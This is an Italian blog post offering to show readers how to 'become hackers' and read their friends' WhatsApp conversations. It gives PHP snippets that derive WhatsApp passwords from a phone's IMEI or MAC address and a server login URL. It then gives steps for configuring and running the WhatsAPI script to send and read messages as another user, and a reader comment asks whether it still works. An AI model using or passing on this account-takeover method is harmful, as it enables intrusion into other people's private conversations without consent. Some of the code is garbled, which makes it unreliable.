Come Leggere qualsiasi Conversazione di WhatsApp

whatsapp1-620x348WhatsApp: Volete diventare dei veri Hacker? Allora ecco come accedere a tutte le conversazioni dei vostri amici su WhatsApp, infatti grazie ad una vulnerabilità è possibile logoravi sui server di WhatsApp e scaricarne tutte le conversazioni!

In particolare il procedimento funziona fintanto che gli sviluppatori non cambieranno il sistema di autenticazione invalidando il metodo descritto di seguito.

Come ben sapete WhatsApp vi consente di crearvi un account senza impostare nessuna password. In realtà il software ne genera una per voi automaticamente prendendo come base (seme in gergo) il vostro codice IMEI il vostro MAC ADDRESS per i dispositivi Apple.

Come generare la password?

Utenti Android

$imei = “112222223333334″; //  IMEI di esempio $android

WhatsAppPassword = md5(strrev($imei)); // calcolo della Password (inversione dell’IMEI e generazione del MD5)

Utenti IOS

$wlanMAC = “AA:BB:CC:DD:EE:FF”; // WLAN MAC address di esempio

$iphoneWhatsAppPassword = md5($wlanMAC$wlanMAC); // calcolo della Password

Utenti BlackBerry

$imei = “112222223333334″; //  IMEI di esempio

$BBWhatsAppPassword = md5(strrev($imei)); // calcolo della Password (inversione dell’IMEI e generazione del MD5)

Utenti Windows Phone

$DeviceUniqueID = “112222223333334″ // ID del Dispositivo

$WPWhatsAppPassword = $DeviceUniqueID // calcolo della Password

E l’Username?

La vostra app di WhatsApp per loggarsi al server utilizza il classico protocollo di sicurezza formato da username e password. L’username non è altro che il numero di cellulare preceduto dal prefisso senza il “+” o doppio zero

Come loggarsi?

Digitate la seguente stringa sul vostro browser:

https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

sostituendo countrycode con il prefisso del vostro paese e nel nostro caso l’Italia 39, phonenumber con il numero di cellulare preceduto dal prefisso come vi ho spiegato prima per l’username e la password generata in precedenza.

Se tutto è andato correttamente riceverete la conferma del server con una stringa come la seguente:

<exit>

<response status=”ok” result=”3334455666″/>

</exit>

Notate immediatamente che l’esito dello stato è OK il che conferma che avete ottenuto l’accesso al vostro account, se invece la password generata o l’utente non è riconosciuto dal servizio di messaggistica apparirà la dicitura FAIL.

Con la stessa identica metodologia, invio di variabili GET su PHP, possiamo inviare messaggi ad utenti WhatsApp o verificare se ci sono messaggi non letti. Per automatizzare la procedura ci viene in soccorso uno script denominato WhatsAPI e disponibile sul circuito GitHub.

Terminato il download di WhatsAPI estraiamo il contenuto e dirigiamoci nella cartella “test” in essa troveremo un unico file denominato “whatsapp.php” apriamolo attraverso l’editor di testo che più preferiamo e dirigiamoci alla 16° riga dove troveremo tre parametri da editare, nello specifico:

$nickname = “WhatsAPI Test”;

$sender = “393481234567″; // Mobile number with country code (but without + or 00)

$imei = “35xxxxxxxxxxxxx”; // MAC Address for iOS IMEI for other platform (Android/etc)

Salviamo il file ed ora siamo pronti ad avviare lo script PHP, semplicemente da riga di comando digitiamo (su BlackBox, altrimenti vi serve un server web come MAMP):

$ php whatsapp.php

Il software ci risponderà con una breve ma efficace guida:

USAGE: whatsapp.php [-l] [-s ] [-i ] phone: full number including country code, without ‘+’ or ’00′ -s: send message -l: listen for new messages -i: interactive conversation with

Facilmente intuiamo che attraverso il parametro “-s” possiamo inviare un nuovo messaggio, con il parametro “-l” individuiamo eventuali messaggi non letti ed infine con il parametro “-i” avviamo una vera e propria conversazione interattiva nella quale potremo scrivere messaggi e leggere le eventuali risposte. Per avviare una conversazione è quindi necessario digitare il seguente comando:

$ php whatsapp.php -i 393481234567

Sempre sulla riga di comando digiteremo il nostro messaggio da inviare e leggeremo le eventuali risposte.

Avete visto com’è tutto sommato semplice violare la privacy di WhatsApp? Conviene stare ben attenti a ciò che scriviamo….

  • Alessandro Memolla

    funziona ancora?